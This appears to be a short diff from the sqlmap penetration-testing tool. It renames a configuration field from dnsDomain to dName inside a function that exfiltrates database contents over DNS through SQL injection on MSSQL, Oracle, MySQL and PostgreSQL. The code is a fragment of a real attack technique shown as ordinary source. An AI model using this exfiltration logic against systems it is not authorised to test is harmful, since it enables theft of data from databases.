@@ -48,7 +48,7 @@ def dnsUse(payload, expression):
4848 count = 0
4949 offset = 1
5050
51- if conf .dnsDomain and Backend .getIdentifiedDbms () in (DBMS .MSSQL , DBMS .ORACLE , DBMS .MYSQL , DBMS .PGSQL ):
51+ if conf .dName and Backend .getIdentifiedDbms () in (DBMS .MSSQL , DBMS .ORACLE , DBMS .MYSQL , DBMS .PGSQL ):
5252 output = hashDBRetrieve (expression , checkConf = True )
5353
5454 if output and PARTIAL_VALUE_MARKER in output or kb .dnsTest is None :
@@ -67,7 +67,7 @@ def dnsUse(payload, expression):
6767 nulledCastedField = agent .hexConvertField (nulledCastedField )
6868 expressionReplaced = expression .replace (fieldToCastStr , nulledCastedField , 1 )
6969
70- expressionRequest = getSPQLSnippet (Backend .getIdentifiedDbms (), "dns_request" , PREFIX = prefix , QUERY = expressionReplaced , SUFFIX = suffix , DOMAIN = conf .dnsDomain )
70+ expressionRequest = getSPQLSnippet (Backend .getIdentifiedDbms (), "dns_request" , PREFIX = prefix , QUERY = expressionReplaced , SUFFIX = suffix , DOMAIN = conf .dName )
7171 expressionUnescaped = unescaper .unescape (expressionRequest )
7272
7373 if Backend .getIdentifiedDbms () in (DBMS .MSSQL , DBMS .PGSQL ):
@@ -108,7 +108,7 @@ def dnsUse(payload, expression):
108108 debugMsg = "performed %d queries in %d seconds" % (count , calculateDeltaSeconds (start ))
109109 logger .debug (debugMsg )
110110
111- elif conf .dnsDomain :
111+ elif conf .dName :
112112 warnMsg = "DNS data exfiltration method through SQL injection "
113113 warnMsg += "is currently not available for DBMS %s" % Backend .getIdentifiedDbms ()
114114 singleTimeWarnMessage (warnMsg )
0 commit comments